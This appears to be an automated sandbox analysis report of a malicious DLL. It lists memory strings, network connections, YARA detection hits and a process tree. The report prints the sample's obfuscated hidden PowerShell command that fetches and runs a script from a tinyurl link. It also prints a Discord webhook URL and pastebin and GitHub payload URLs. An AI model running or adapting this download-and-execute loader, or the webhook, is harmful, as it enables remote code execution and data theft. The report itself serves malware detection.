Source: powershell.exe, 00000007.00000002.1650878851.0000019382060000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1773563373.0000018503C82000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1775512981.00000148B368A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1652165646.0000024759677000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1951674097.0000021515635000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2026955387.000001B753227000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://discord.com
Source: powershell.exe, 00000007.00000002.1726191854.0000019390073000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1726191854.00000193901B6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1745911441.00000247675A3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1745911441.00000247676E6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000007.00000002.1650878851.0000019381628000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1773563373.0000018504B8A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1775512981.00000148B456C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1652165646.0000024758B5F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1951674097.0000021514BEA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1951674097.0000021514C04000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1951674097.000002151474A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2026955387.000001B752286000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2026955387.000001B7527F6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2026955387.000001B7527DB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pastebin.com
Source: powershell.exe, 00000018.00000002.2026955387.000001B752286000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pastebin.com/raw/sA04Mwk2
Source: powershell.exe, 0000000D.00000002.1652165646.0000024757755000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000007.00000002.1650878851.00000193816A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1773563373.0000018504C00000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1775512981.00000148B45E2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1652165646.0000024758BD8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://raw.githubuserconte
Source: powershell.exe, 00000007.00000002.1650878851.00000193816A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1650878851.00000193803CC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1773563373.0000018503934000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1773563373.0000018504C00000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1775512981.00000148B3313000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1775512981.00000148B45E2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1652165646.0000024758BD8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1652165646.00000247578FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1951674097.0000021514C83000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1951674097.0000021514CB2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2026955387.000001B7528A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2026955387.000001B752875000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://raw.githubusercontent.com
Source: powershell.exe, 00000018.00000002.2026955387.000001B752875000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
Source: powershell.exe, 00000007.00000002.1650878851.0000019380001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1773563373.0000018503561000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1775512981.00000148B2F41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1652165646.0000024757531000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1951674097.00000215141ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2026955387.000001B751DA1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000007.00000002.1650878851.0000019380225000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1650878851.0000019381608000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1650878851.0000019380E48000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1773563373.0000018503787000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1773563373.00000185047CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1773563373.0000018504B67000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1775512981.00000148B41D5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1775512981.00000148B454A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1775512981.00000148B3165000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1652165646.0000024758B3F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1652165646.0000024757755000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1652165646.0000024758440000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tinyurl.com
Source: powershell.exe, 0000000D.00000002.1652165646.0000024758440000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tinyurl.com/yeykydun
Source: powershell.exe, 0000000D.00000002.1652165646.0000024757755000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000007.00000002.1761764309.00000193E8BBD000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2364535890.000002152C3C0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.microsoft.co
Source: powershell.exe, 00000007.00000002.1650878851.0000019380001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1773563373.0000018503561000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1775512981.00000148B2F41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1652165646.0000024757531000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1951674097.00000215141ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1951674097.00000215141DF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2026955387.000001B751DDD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2026955387.000001B751DC9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 0000000D.00000002.1745911441.00000247676E6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000D.00000002.1745911441.00000247676E6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000D.00000002.1745911441.00000247676E6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000007.00000002.1650878851.0000019380448000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1650878851.0000019382060000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1773563373.0000018503C82000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1775512981.00000148B368A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1652165646.0000024757A40000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1652165646.0000024759677000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1951674097.0000021515635000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2026955387.000001B753227000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.com
Source: powershell.exe, 00000007.00000002.1650878851.0000019382060000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1773563373.0000018503C82000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1775512981.00000148B368A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1652165646.0000024759677000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1951674097.0000021515635000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2026955387.000001B753227000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/webhooks/128545359042878
Source: powershell.exe, 00000007.00000002.1650878851.000001938174E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1773563373.0000018504C8C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1775512981.00000148B469A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1652165646.0000024758C62000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1951674097.0000021514D4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2026955387.000001B75290F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/webhooks/1285453590428782614/2ICVsBAPEUQ
Source: powershell.exe, 00000018.00000002.2026955387.000001B75290F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_
Source: powershell.exe, 00000018.00000002.2026955387.000001B753227000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.comP
Source: powershell.exe, 0000000D.00000002.1652165646.0000024757755000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000007.00000002.1650878851.0000019380E48000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1773563373.00000185047CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1775512981.00000148B37D5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1652165646.0000024758440000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1951674097.000002151474A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2026955387.000001B752286000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
Source: powershell.exe, 00000007.00000002.1726191854.0000019390073000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1726191854.00000193901B6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1745911441.00000247675A3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1745911441.00000247676E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 0000000D.00000002.1652165646.0000024758B3F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1951674097.0000021514BF4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2026955387.000001B7527E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com
Source: powershell.exe, 0000000D.00000002.1652165646.00000247578C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1951674097.0000021514BF4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1951674097.0000021514BEA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2026955387.000001B7527E6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2026955387.000001B7527DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/sA04Mwk2
Source: powershell.exe, 0000000D.00000002.1652165646.00000247578C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.comp6
Source: powershell.exe, 00000007.00000002.1650878851.00000193816A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1775512981.00000148B45E2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1652165646.0000024758BD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercont
Source: powershell.exe, 00000007.00000002.1650878851.00000193816A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1650878851.00000193803CC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1773563373.0000018503934000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1773563373.0000018504C00000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1775512981.00000148B3313000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1775512981.00000148B45E2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1652165646.0000024758BD8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1652165646.00000247578FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1951674097.0000021514CB2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2026955387.000001B7528A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com
Source: powershell.exe, 00000007.00000002.1650878851.000001938164F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1650878851.0000019381628000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1773563373.0000018503934000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1773563373.0000018504C00000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1773563373.0000018504B8A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1775512981.00000148B456C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1775512981.00000148B4590000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1775512981.00000148B3310000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1652165646.0000024758B87000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1652165646.0000024758B5F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1652165646.00000247578FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1951674097.0000021514CB2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1951674097.0000021514C04000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2026955387.000001B75281D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2026955387.000001B7527F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
Source: powershell.exe, 00000008.00000002.1773563373.0000018504C00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.comx
Source: unknown | Network traffic detected: HTTP traffic on port 52114 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 52104 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 52155
Source: unknown | Network traffic detected: HTTP traffic on port 52049 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 52114
Source: unknown | Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 52125 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 52102 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 52167 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 52050 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 52203 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 52206
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown | Network traffic detected: HTTP traffic on port 52155 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 52167
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 52102
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 52125
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 52049
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 52104
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 52203
Source: unknown | Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 52050
Source: unknown | Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown | Network traffic detected: HTTP traffic on port 52206 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown | Network traffic detected: HTTP traffic on port 49771 -> 443
Source: unknown | HTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.7:49754 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.7:49752 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.7:49753 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.7:49755 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.7:49770 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.7:49769 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.7:49771 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.7:49768 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 162.159.128.233:443 -> 192.168.2.7:52050 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 162.159.128.233:443 -> 192.168.2.7:52049 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 162.159.128.233:443 -> 192.168.2.7:52102 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 162.159.128.233:443 -> 192.168.2.7:52104 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.7:52114 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.7:52125 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.7:52155 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.7:52167 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 162.159.128.233:443 -> 192.168.2.7:52203 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 162.159.128.233:443 -> 192.168.2.7:52206 version: TLS 1.2

System Summary

Source: amsi64_6448.amsi.csv, type: OTHER | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: amsi64_7172.amsi.csv, type: OTHER | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: amsi64_7180.amsi.csv, type: OTHER | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: amsi64_7352.amsi.csv, type: OTHER | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: amsi64_5844.amsi.csv, type: OTHER | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: amsi64_4240.amsi.csv, type: OTHER | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 6448, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 7172, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 7180, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 7352, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 5844, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 4240, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 7_2_00007FFAAB53C732
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 7_2_00007FFAAB53B986
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 7_2_00007FFAAB5361B1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 20_2_00007FFAAB51B8C0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 20_2_00007FFAAB51C702
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 20_2_00007FFAAB5262F0
Source: amsi64_6448.amsi.csv, type: OTHER | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: amsi64_7172.amsi.csv, type: OTHER | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: amsi64_7180.amsi.csv, type: OTHER | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: amsi64_7352.amsi.csv, type: OTHER | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: amsi64_5844.amsi.csv, type: OTHER | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: amsi64_4240.amsi.csv, type: OTHER | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 6448, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 7172, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 7180, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 7352, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 5844, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 4240, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engine | Classification label: mal100.troj.evad.winDLL@37/19@7/4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7188:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5104:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7196:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7204:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5mk35nbp.5hg.ps1
Source: 5UIy3bo46y.dll | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\System32\conhost.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\System32\loaddll64.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\5UIy3bo46y.dll",#1
Source: 5UIy3bo46y.dll | ReversingLabs: Detection: 50%
Source: unknown | Process created: C:\Windows\System32\loaddll64.exe loaddll64.exe "C:\Users\user\Desktop\5UIy3bo46y.dll"
Source: C:\Windows\System32\loaddll64.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll64.exe | Process created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\5UIy3bo46y.dll",#1
Source: C:\Windows\System32\loaddll64.exe | Process created: C:\Windows\System32\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\5UIy3bo46y.dll
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\5UIy3bo46y.dll",#1
Source: C:\Windows\System32\loaddll64.exe | Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\5UIy3bo46y.dll,DllRegisterServer
Source: C:\Windows\System32\rundll32.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle h -command sal callit ('iE'+'x'); sal $env:os iWr; calliT(WINDOWS_NT('ti' + 'nyu' + 'rl.c' + 'om/yeykydun') -usebasicparsing)
